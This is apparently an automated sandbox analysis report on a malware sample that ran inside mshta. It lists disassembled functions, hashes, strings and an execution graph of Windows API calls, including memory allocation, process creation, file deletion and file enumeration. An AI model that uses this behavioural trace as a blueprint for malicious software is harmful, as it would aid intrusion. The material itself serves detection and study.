                                                                                                                                    Function 0196F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019B02BD
                                                                                                                                    • RTL: Re-Waiting, xrefs: 019B031E
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019B02E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
                                                                                                                                    • Instruction ID: 05a6c95f6e8dd8a40757bc1b9ef26e12eae00b4e2b7749b96fef3de745f64237
                                                                                                                                    • Opcode Fuzzy Hash: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
                                                                                                                                    • Instruction Fuzzy Hash: 5FE1EF306087429FD725CF2CD994B6ABBE8BF84314F180A5DF5A98B2E1D734D844CB52
                                                                                                                                    Function 0197BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 019B7BAC
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019B7B7F
                                                                                                                                    • RTL: Resource at %p, xrefs: 019B7B8E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
                                                                                                                                    • Instruction ID: 071465c7b84c4a6fcc1977e491ff12eceaed701049369b6f0b8c437e1d3a79a8
                                                                                                                                    • Opcode Fuzzy Hash: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
                                                                                                                                    • Instruction Fuzzy Hash: 6F41E2317047069FD724DE29C940B6AB7E9EF89B11F000A1DF95EDB280DB31E5058B91
                                                                                                                                    Function 0197B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019B728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 019B72C1
                                                                                                                                    • RTL: Resource at %p, xrefs: 019B72A3
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019B7294
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
                                                                                                                                    • Instruction ID: 4f744f56e53120fddc662c30c4f3aca512ea73486686a25442fbe240138f286e
                                                                                                                                    • Opcode Fuzzy Hash: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
                                                                                                                                    • Instruction Fuzzy Hash: 3541F031700206ABC724DE69CD81FA6B7A5FFD4B11F100A19F95EAB280DB31E842C7D1
                                                                                                                                    Function 019F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                    • Opcode ID: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
                                                                                                                                    • Instruction ID: c9a836eacd0326184106c82e0403cc920d64c6adda868c4d80ce856481685932
                                                                                                                                    • Opcode Fuzzy Hash: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
                                                                                                                                    • Instruction Fuzzy Hash: 16318472A00619AFDB20DF2DCC40BEE77BCEB44611F444559E94DE3200EB70DA448BA1
                                                                                                                                    Function 01987D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: 5ad9ca3ae004ad3ae573d18ce675975b2022a84f7fbded479e2dd01e2e1daf13
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: 0591B871E002169BDB28FF9DC880ABEBBA9EF44321F74451AE95DE72D1D7309941C721
                                                                                                                                    Function 01949126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
                                                                                                                                    • Instruction ID: dfe940a2a40959d84a4c1a8ab170deca3ced959d7272f00eb6318fa637db8cfd
                                                                                                                                    • Opcode Fuzzy Hash: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
                                                                                                                                    • Instruction Fuzzy Hash: 20811975D012699BDB35CB54CC44BEEBBB8BB48754F0041EAAA1DB7280D7709E85CFA0

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:2.6%
                                                                                                                                    Dynamic/Decrypted Code Coverage:4%
                                                                                                                                    Signature Coverage:2.1%
                                                                                                                                    Total number of Nodes:470
                                                                                                                                    Total number of Limit Nodes:74
                                                                                                                                    execution_graph 98511 b89bb0 98513 b89f7f 98511->98513 98514 b8a3d9 98513->98514 98515 bab260 98513->98515 98516 bab286 98515->98516 98521 b84180 98516->98521 98518 bab292 98519 bab2cb 98518->98519 98524 ba5770 98518->98524 98519->98514 98528 b932a0 98521->98528 98523 b8418d 98523->98518 98525 ba57d2 98524->98525 98527 ba57df 98525->98527 98552 b91a80 98525->98552 98527->98519 98529 b932bd 98528->98529 98531 b932d6 98529->98531 98532 ba9f70 98529->98532 98531->98523 98534 ba9f8a 98532->98534 98533 ba9fb9 98533->98531 98534->98533 98539 ba8b30 98534->98539 98540 ba8b4d 98539->98540 98546 3982c0a 98540->98546 98541 ba8b79 98543 bab600 98541->98543 98549 ba9890 98543->98549 98545 baa032 98545->98531 98547 3982c1f LdrInitializeThunk 98546->98547 98548 3982c11 98546->98548 98547->98541 98548->98541 98550 ba98ad 98549->98550 98551 ba98be RtlFreeHeap 98550->98551 98551->98545 98553 b91abb 98552->98553 98568 b97f60 98553->98568 98555 b91ac3 98566 b91da3 98555->98566 98579 bab6e0 98555->98579 98557 b91ad9 98558 bab6e0 RtlAllocateHeap 98557->98558 98559 b91aea 98558->98559 98560 bab6e0 RtlAllocateHeap 98559->98560 98561 b91afb 98560->98561 98567 b91b92 98561->98567 98590 b96ac0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98561->98590 98564 b91d52 98586 ba80b0 98564->98586 98566->98527 98582 b945e0 98567->98582 98569 b97f8c 98568->98569 98591 b97e50 98569->98591 98572 b97fb9 98574 b97fc4 98572->98574 98597 ba9510 98572->98597 98573 b97fd1 98575 b97fed 98573->98575 98577 ba9510 NtClose 98573->98577 98574->98555 98575->98555 98578 b97fe3 98577->98578 98578->98555 98605 ba9840 98579->98605 98581 bab6fb 98581->98557 98583 b94604 98582->98583 98584 b94640 LdrLoadDll 98583->98584 98585 b9460b 98583->98585 98584->98585 98585->98564 98587 ba8112 98586->98587 98588 ba811f 98587->98588 98608 b91dc0 98587->98608 98588->98566 98590->98567 98592 b97f46 98591->98592 98593 b97e6a 98591->98593 98592->98572 98592->98573 98600 ba8bd0 98593->98600 98596 ba9510 NtClose 98596->98592 98598 ba952a 98597->98598 98599 ba953b NtClose 98598->98599 98599->98574 98601 ba8bed 98600->98601 98604 39835c0 LdrInitializeThunk 98601->98604 98602 b97f3a 98602->98596 98604->98602 98606 ba985d 98605->98606 98607 ba986e RtlAllocateHeap 98606->98607 98607->98581 98610 b91de0 98608->98610 98624 b98230 98608->98624 98617 b9232a 98610->98617 98628 ba1250 98610->98628 98612 b91e3e 98612->98617 98632 bac7c0 98612->98632 98614 b91ff4 98637 bac8f0 98614->98637 98617->98588 98618 b92009 98620 b92056 98618->98620 98643 b908d0 98618->98643 98620->98617 98622 b908d0 LdrInitializeThunk 98620->98622 98646 b981d0 98620->98646 98621 b981d0 LdrInitializeThunk 98623 b921a7 98621->98623 98622->98620 98623->98620 98623->98621 98625 b9823d 98624->98625 98626 b9825e SetErrorMode 98625->98626 98627 b98265 98625->98627 98626->98627 98627->98610 98629 ba1254 98628->98629 98650 bab570 98629->98650 98631 ba1271 98631->98612 98633 bac7d0 98632->98633 98634 bac7d6 98632->98634 98633->98614 98635 bab6e0 RtlAllocateHeap 98634->98635 98636 bac7fc 98635->98636 98636->98614 98638 bac860 98637->98638 98639 bab6e0 RtlAllocateHeap 98638->98639 98640 bac8bd 98638->98640 98641 bac89a 98639->98641 98640->98618 98642 bab600 RtlFreeHeap 98641->98642 98642->98640 98657 ba97a0 98643->98657 98647 b981e3 98646->98647 98662 ba8a30 98647->98662 98649 b9820e 98649->98620 98653 ba9680 98650->98653 98652 bab5a1 98652->98631 98654 ba9712 98653->98654 98656 ba96a8 98653->98656 98655 ba9728 NtAllocateVirtualMemory 98654->98655 98655->98652 98656->98652 98658 ba97ba 98657->98658 98661 3982c70 LdrInitializeThunk 98658->98661 98659 b908f2 98659->98623 98661->98659 98663 ba8aae 98662->98663 98665 ba8a5b 98662->98665 98667 3982dd0 LdrInitializeThunk 98663->98667 98664 ba8ad3 98664->98649 98665->98649 98667->98664 98848 3982ad0 LdrInitializeThunk 98668 b96e30 98669 b96e5a 98668->98669 98672 b98000 98669->98672 98671 b96e81 98673 b9801d 98672->98673 98679 ba8c20 98673->98679 98675 b9806d 98676 b98074 98675->98676 98684 ba8d00 98675->98684 98676->98671 98678 b9809d 98678->98671 98680 ba8cb8 98679->98680 98682 ba8c48 98679->98682 98689 3982f30 LdrInitializeThunk 98680->98689 98681 ba8cf1 98681->98675 98682->98675 98685 ba8dae 98684->98685 98687 ba8d2c 98684->98687 98690 3982d10 LdrInitializeThunk 98685->98690 98686 ba8df3 98686->98678 98687->98678 98689->98681 98690->98686 98691 b9ae30 98696 b9ab40 98691->98696 98693 b9ae3d 98710 b9a7b0 98693->98710 98695 b9ae59 98697 b9ab65 98696->98697 98721 b98440 98697->98721 98700 b9acb0 98700->98693 98702 b9acc7 98702->98693 98703 b9acbe 98703->98702 98705 b9adb5 98703->98705 98740 b9a200 98703->98740 98707 b9ae1a 98705->98707 98749 b9a570 98705->98749 98708 bab600 RtlFreeHeap 98707->98708 98709 b9ae21 98708->98709 98709->98693 98711 b9a7c6 98710->98711 98714 b9a7d1 98710->98714 98712 bab6e0 RtlAllocateHeap 98711->98712 98712->98714 98713 b9a7f8 98713->98695 98714->98713 98715 b98440 GetFileAttributesW 98714->98715 98716 b9ab15 98714->98716 98719 b9a200 RtlFreeHeap 98714->98719 98720 b9a570 RtlFreeHeap 98714->98720 98715->98714 98717 b9ab2e 98716->98717 98718 bab600 RtlFreeHeap 98716->98718 98717->98695 98718->98717 98719->98714 98720->98714 98722 b98461 98721->98722 98723 b98468 GetFileAttributesW 98722->98723 98724 b9841f 98722->98724 98723->98724 98724->98700 98725 ba34b0 98724->98725 98726 ba34be 98725->98726 98727 ba34c5 98725->98727 98726->98703 98728 b945e0 LdrLoadDll 98727->98728 98729 ba34fa 98728->98729 98730 ba3509 98729->98730 98753 ba2f70 LdrLoadDll 98729->98753 98732 bab6e0 RtlAllocateHeap 98730->98732 98736 ba36b7 98730->98736 98733 ba3522 98732->98733 98734 ba36ad 98733->98734 98733->98736 98737 ba353e 98733->98737 98735 bab600 RtlFreeHeap 98734->98735 98734->98736 98735->98736 98736->98703 98737->98736 98738 bab600 RtlFreeHeap 98737->98738 98739 ba36a1 98738->98739 98739->98703 98741 b9a226 98740->98741 98754 b9dc50 98741->98754 98743 b9a298 98745 b9a2b6 98743->98745 98746 b9a420 98743->98746 98744 b9a405 98744->98703 98745->98744 98759 b9a0c0 98745->98759 98746->98744 98747 b9a0c0 RtlFreeHeap 98746->98747 98747->98746 98750 b9a596 98749->98750 98751 b9dc50 RtlFreeHeap 98750->98751 98752 b9a61d 98751->98752 98752->98705 98753->98730 98755 b9dc74 98754->98755 98756 b9dc81 98755->98756 98757 bab600 RtlFreeHeap 98755->98757 98756->98743 98758 b9dcc4 98757->98758 98758->98743 98760 b9a0dd 98759->98760 98763 b9dce0 98760->98763 98762 b9a1e3 98762->98745 98764 b9dd04 98763->98764 98765 b9ddae 98764->98765 98766 bab600 RtlFreeHeap 98764->98766 98765->98762 98766->98765 98849 b973f0 98850 b97462 98849->98850 98851 b97408 98849->98851 98851->98850 98853 b9b360 98851->98853 98854 b9b386 98853->98854 98855 b9b5b9 98854->98855 98882 ba9920 98854->98882 98855->98850 98857 b9b3fc 98857->98855 98858 bac8f0 2 API calls 98857->98858 98859 b9b41b 98858->98859 98859->98855 98860 b9b4f2 98859->98860 98862 ba8b30 LdrInitializeThunk 98859->98862 98861 b9b511 98860->98861 98863 b95bd0 LdrInitializeThunk 98860->98863 98889 ba58a0 98861->98889 98864 b9b47d 98862->98864 98863->98861 98864->98860 98867 b9b486 98864->98867 98866 b9b53e 98869 b9b5a1 98866->98869 98894 ba86a0 98866->98894 98867->98855 98868 b9b4b8 98867->98868 98878 b9b4da 98867->98878 98885 b95bd0 98867->98885 98909 ba48f0 LdrInitializeThunk 98868->98909 98871 b981d0 LdrInitializeThunk 98869->98871 98870 b981d0 LdrInitializeThunk 98875 b9b4e8 98870->98875 98876 b9b5af 98871->98876 98875->98850 98876->98850 98877 b9b578 98899 ba8750 98877->98899 98878->98870 98880 b9b592 98904 ba88b0 98880->98904 98883 ba993d 98882->98883 98884 ba994e CreateProcessInternalW 98883->98884 98884->98857 98886 b95bd1 98885->98886 98887 ba8d00 LdrInitializeThunk 98886->98887 98888 b95c0b 98887->98888 98888->98868 98890 ba5905 98889->98890 98891 ba5940 98890->98891 98910 b959a0 98890->98910 98891->98866 98893 ba5922 98893->98866 98895 ba871d 98894->98895 98897 ba86cb 98894->98897 98914 39839b0 LdrInitializeThunk 98895->98914 98896 ba8742 98896->98877 98897->98877 98900 ba8778 98899->98900 98901 ba87ca 98899->98901 98900->98880 98915 3984340 LdrInitializeThunk 98901->98915 98902 ba87ef 98902->98880 98905 ba892a 98904->98905 98906 ba88d8 98904->98906 98916 3982fb0 LdrInitializeThunk 98905->98916 98906->98869 98907 ba894f 98907->98869 98909->98878 98912 b95932 98910->98912 98911 b981d0 LdrInitializeThunk 98911->98912 98912->98911 98913 b95957 98912->98913 98913->98893 98914->98896 98915->98902 98916->98907 98917 b99cf3 98918 b99cff 98917->98918 98919 bab600 RtlFreeHeap 98918->98919 98920 b99d06 98918->98920 98919->98920 98921 bab2f0 98922 bab2fb 98921->98922 98923 bab31a 98922->98923 98925 ba5c60 98922->98925 98926 ba5cc2 98925->98926 98927 ba5ccf 98926->98927 98929 b923a0 98926->98929 98927->98923 98930 b92375 98929->98930 98933 ba95b0 98930->98933 98932 b9238b 98932->98927 98934 ba963f 98933->98934 98936 ba95db 98933->98936 98938 3982e80 LdrInitializeThunk 98934->98938 98935 ba9670 98935->98932 98936->98932 98938->98935 98939 ba9470 98940 ba94e7 98939->98940 98942 ba949b 98939->98942 98941 ba94fd NtDeleteFile 98940->98941 98943 b988f4 98944 b98904 98943->98944 98946 b988b4 98944->98946 98947 b97050 LdrInitializeThunk LdrInitializeThunk 98944->98947 98947->98946 98767 b927b7 98768 b9281b 98767->98768 98770 b927bc 98767->98770 98772 b92843 98768->98772 98773 b96360 98768->98773 98771 b945e0 LdrLoadDll 98770->98771 98771->98768 98774 b96393 98773->98774 98775 b963b7 98774->98775 98780 ba9070 98774->98780 98775->98772 98777 b963da 98777->98775 98778 ba9510 NtClose 98777->98778 98779 b9645c 98778->98779 98779->98772 98781 ba908d 98780->98781 98784 3982ca0 LdrInitializeThunk 98781->98784 98782 ba90b9 98782->98777 98784->98782 98948 b8b5e0 98949 bab570 NtAllocateVirtualMemory 98948->98949 98950 b8cc51 98949->98950 98785 bac820 98786 bab600 RtlFreeHeap 98785->98786 98787 bac835 98786->98787 98788 ba1c20 98789 ba1c39 98788->98789 98790 ba1cc5 98789->98790 98791 ba1c84 98789->98791 98794 ba1cc0 98789->98794 98792 bab600 RtlFreeHeap 98791->98792 98793 ba1c90 98792->98793 98795 bab600 RtlFreeHeap 98794->98795 98795->98790 98951 ba8ae0 98952 ba8afa 98951->98952 98955 3982df0 LdrInitializeThunk 98952->98955 98953 ba8b22 98955->98953 98956 ba61e0 98957 ba623a 98956->98957 98959 ba6247 98957->98959 98960 ba3be0 98957->98960 98961 bab570 NtAllocateVirtualMemory 98960->98961 98962 ba3c21 98961->98962 98963 b945e0 LdrLoadDll 98962->98963 98966 ba3d2e 98962->98966 98964 ba3c67 98963->98964 98965 ba3cb0 Sleep 98964->98965 98964->98966 98965->98964 98966->98959 98967 ba8960 98968 ba89ec 98967->98968 98969 ba8988 98967->98969 98972 3982ee0 LdrInitializeThunk 98968->98972 98970 ba8a1d 98972->98970 98973 ba13e4 98974 ba13ea 98973->98974 98986 ba9380 98974->98986 98976 ba1432 98977 ba1450 98976->98977 98978 ba1465 98976->98978 98980 ba9510 NtClose 98977->98980 98979 ba9510 NtClose 98978->98979 98983 ba146e 98979->98983 98981 ba1459 98980->98981 98982 ba14a5 98983->98982 98984 bab600 RtlFreeHeap 98983->98984 98985 ba1499 98984->98985 98987 ba9424 98986->98987 98989 ba93a8 98986->98989 98988 ba943a NtReadFile 98987->98988 98988->98976 98989->98976 98801 b9319c 98802 b97e50 2 API calls 98801->98802 98803 b931ac 98802->98803 98804 ba9510 NtClose 98803->98804 98805 b931c8 98803->98805 98804->98805 98991 b89b50 98993 b89b5f 98991->98993 98992 b89ba0 98993->98992 98994 b89b8d CreateThread 98993->98994 98806 b97210 98807 b9722c 98806->98807 98808 b97279 98806->98808 98807->98808 98810 ba9510 NtClose 98807->98810 98809 b973b1 98808->98809 98817 b965f0 NtClose LdrInitializeThunk LdrInitializeThunk 98808->98817 98811 b97244 98810->98811 98816 b965f0 NtClose LdrInitializeThunk LdrInitializeThunk 98811->98816 98813 b9738b 98813->98809 98818 b967c0 NtClose LdrInitializeThunk LdrInitializeThunk 98813->98818 98816->98808 98817->98813 98818->98809 98995 b9c6d0 98997 b9c6f9 98995->98997 98996 b9c7fd 98997->98996 98998 b9c7a3 FindFirstFileW 98997->98998 98998->98996 99000 b9c7be 98998->99000 98999 b9c7e4 FindNextFileW 98999->99000 99001 b9c7f6 FindClose 98999->99001 99000->98999 99001->98996 99002 b95c50 99003 b981d0 LdrInitializeThunk 99002->99003 99004 b95c80 99003->99004 99006 b95cac 99004->99006 99007 b98150 99004->99007 99008 b98194 99007->99008 99009 b981b5 99008->99009 99014 ba8800 99008->99014 99009->99004 99011 b981a5 99012 b981c1 99011->99012 99013 ba9510 NtClose 99011->99013 99012->99004 99013->99009 99015 ba887d 99014->99015 99017 ba882b 99014->99017 99019 3984650 LdrInitializeThunk 99015->99019 99016 ba88a2 99016->99011 99017->99011 99019->99016 98819 ba1890 98820 ba18ac 98819->98820 98821 ba18e8 98820->98821 98822 ba18d4 98820->98822 98824 ba9510 NtClose 98821->98824 98823 ba9510 NtClose 98822->98823 98825 ba18dd 98823->98825 98826 ba18f1 98824->98826 98829 bab720 RtlAllocateHeap 98826->98829 98828 ba18fc 98829->98828 98830 ba9210 98831 ba92c7 98830->98831 98833 ba923f 98830->98833 98832 ba92dd NtCreateFile 98831->98832 98839 b9320f 98840 b931a6 98839->98840 98841 ba9510 NtClose 98840->98841 98842 b931c8 98840->98842 98841->98842 99022 b90e40 99023 b90e59 99022->99023 99024 b945e0 LdrLoadDll 99023->99024 99025 b90e77 99024->99025 99026 b90eb0 PostThreadMessageW 99025->99026 99027 b90ec3 99025->99027 99026->99027 99028 b9f940 99029 b9f9a4 99028->99029 99030 b96360 2 API calls 99029->99030 99032 b9fad7 99030->99032 99031 b9fade 99032->99031 99057 b96470 99032->99057 99034 b9fb5a 99035 b9fc92 99034->99035 99054 b9fc83 99034->99054 99061 b9f720 99034->99061 99036 ba9510 NtClose 99035->99036 99038 b9fc9c 99036->99038 99039 b9fb96 99039->99035 99040 b9fba1 99039->99040 99041 bab6e0 RtlAllocateHeap 99040->99041 99042 b9fbca 99041->99042 99043 b9fbe9 99042->99043 99044 b9fbd3 99042->99044 99070 b9f610 CoInitialize 99043->99070 99045 ba9510 NtClose 99044->99045 99047 b9fbdd 99045->99047 99048 b9fbf7 99073 ba8fd0 99048->99073 99050 b9fc72 99051 ba9510 NtClose 99050->99051 99052 b9fc7c 99051->99052 99053 bab600 RtlFreeHeap 99052->99053 99053->99054 99055 b9fc15 99055->99050 99056 ba8fd0 LdrInitializeThunk 99055->99056 99056->99055 99058 b96495 99057->99058 99077 ba8e50 99058->99077 99062 b9f73c 99061->99062 99063 b945e0 LdrLoadDll 99062->99063 99065 b9f75a 99063->99065 99064 b9f763 99064->99039 99065->99064 99066 b945e0 LdrLoadDll 99065->99066 99067 b9f82e 99066->99067 99068 b945e0 LdrLoadDll 99067->99068 99069 b9f88b 99067->99069 99068->99069 99069->99039 99072 b9f675 99070->99072 99071 b9f70b CoUninitialize 99071->99048 99072->99071 99074 ba8fea 99073->99074 99082 3982ba0 LdrInitializeThunk 99074->99082 99075 ba901a 99075->99055 99078 ba8e6a 99077->99078 99081 3982c60 LdrInitializeThunk 99078->99081 99079 b96509 99079->99034 99081->99079 99082->99075 99083 b92340 99084 b92376 99083->99084 99085 ba8b30 LdrInitializeThunk 99083->99085 99086 b9238b 99084->99086 99087 ba95b0 LdrInitializeThunk 99084->99087 99085->99084 99087->99086 99088 ba0240 99089 ba025d 99088->99089 99090 b945e0 LdrLoadDll 99089->99090 99091 ba027b 99090->99091

                                                                                                                                    Executed Functions

                                                                                                                                    Function 00B89BB0 Relevance: 38.0, Strings: 30, Instructions: 456COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 27 b89bb0-b89f7d 28 b89f8e-b89f9a 27->28 29 b89f9c-b89fa5 28->29 30 b89fb2-b89fbc 28->30 31 b89fb0 29->31 32 b89fa7-b89fad 29->32 33 b8a00d-b8a019 30->33 34 b89fbe-b89fd9 30->34 31->28 32->31 35 b8a01b-b8a03c 33->35 36 b8a03e-b8a04f 33->36 38 b89fdb-b89fdf 34->38 39 b89fe0-b89fe2 34->39 35->33 40 b8a060-b8a069 36->40 38->39 41 b89ff4-b8a005 39->41 42 b89fe4-b89ff2 39->42 44 b8a06b-b8a07e 40->44 45 b8a080 40->45 43 b8a00b 41->43 42->43 43->30 44->40 47 b8a087-b8a08b 45->47 48 b8a08d-b8a0a5 47->48 49 b8a0a7-b8a0b8 47->49 48->47 50 b8a0c9-b8a0d5 49->50 51 b8a0ed-b8a0f6 50->51 52 b8a0d7-b8a0e0 50->52 53 b8a0fc-b8a106 51->53 54 b8a2e1-b8a2e8 51->54 55 b8a0eb 52->55 56 b8a0e2-b8a0e8 52->56 60 b8a117-b8a123 53->60 58 b8a2ea-b8a30d 54->58 59 b8a30f-b8a319 54->59 55->50 56->55 58->54 61 b8a32a-b8a333 59->61 62 b8a134-b8a13b 60->62 63 b8a125-b8a132 60->63 65 b8a351-b8a358 61->65 66 b8a335-b8a341 61->66 67 b8a15c-b8a16f 62->67 68 b8a13d-b8a15a 62->68 63->60 72 b8a35e-b8a368 65->72 73 b8a514-b8a51e 65->73 69 b8a34f 66->69 70 b8a343-b8a349 66->70 71 b8a180-b8a18c 67->71 68->62 69->61 70->69 75 b8a18e-b8a1a0 71->75 76 b8a1a2-b8a1b1 71->76 77 b8a379-b8a385 72->77 75->71 79 b8a297-b8a2a1 76->79 80 b8a1b7-b8a1c1 76->80 81 b8a39c-b8a3a3 77->81 82 b8a387-b8a39a 77->82 87 b8a2b2-b8a2bb 79->87 85 b8a1d2-b8a1dc 80->85 83 b8a3d4 call bab260 81->83 84 b8a3a5-b8a3d2 81->84 82->77 96 b8a3d9-b8a3e2 83->96 84->81 91 b8a1de-b8a214 85->91 92 b8a216-b8a220 85->92 88 b8a2bd-b8a2d0 87->88 89 b8a2d2-b8a2dc 87->89 88->87 89->51 91->85 94 b8a231-b8a23a 92->94 97 b8a23c-b8a245 94->97 98 b8a252-b8a25c 94->98 99 b8a3e4-b8a405 96->99 100 b8a407-b8a411 96->100 101 b8a250 97->101 102 b8a247-b8a24d 97->102 103 b8a26d-b8a279 98->103 99->96 104 b8a422-b8a42e 100->104 101->94 102->101 106 b8a27b-b8a288 103->106 107 b8a295 103->107 108 b8a430-b8a442 104->108 109 b8a444-b8a44b 104->109 111 b8a28a-b8a290 106->111 112 b8a293 106->112 107->54 108->104 113 b8a47d-b8a487 109->113 114 b8a44d-b8a47b 109->114 111->112 112->103 116 b8a498-b8a4a4 113->116 114->109 117 b8a4b1-b8a4b8 116->117 118 b8a4a6-b8a4af 116->118 119 b8a4ba-b8a4e3 117->119 120 b8a4e5-b8a4ec 117->120 118->116 119->117 120->73 122 b8a4ee-b8a512 120->122 122->120
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *$*^$0\$2$2a$6$;$<<$H$N$Ni$O$P$S:$Sr$YK_N[!$Yv$[!$_$b$c$d$i$i$i$p$t$v$w$x>
                                                                                                                                    • API String ID: 0-4058102179
                                                                                                                                    • Opcode ID: 58cc2750c4c177d55aa02d8ffe21a997ef635dc814ab3b96c1fc2c6ea1c4c507
                                                                                                                                    • Instruction ID: ed079d63ad3910ca2fe8b92dd88b8799343d9159e3e9958df9204c09bf6506c5
                                                                                                                                    • Opcode Fuzzy Hash: 58cc2750c4c177d55aa02d8ffe21a997ef635dc814ab3b96c1fc2c6ea1c4c507
                                                                                                                                    • Instruction Fuzzy Hash: 434290B0D05228CBEBA4DF44C9947DDBBB2BB45308F1481DAC10D6B2A1CBB55AC9DF46
                                                                                                                                    Function 00B9C6D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
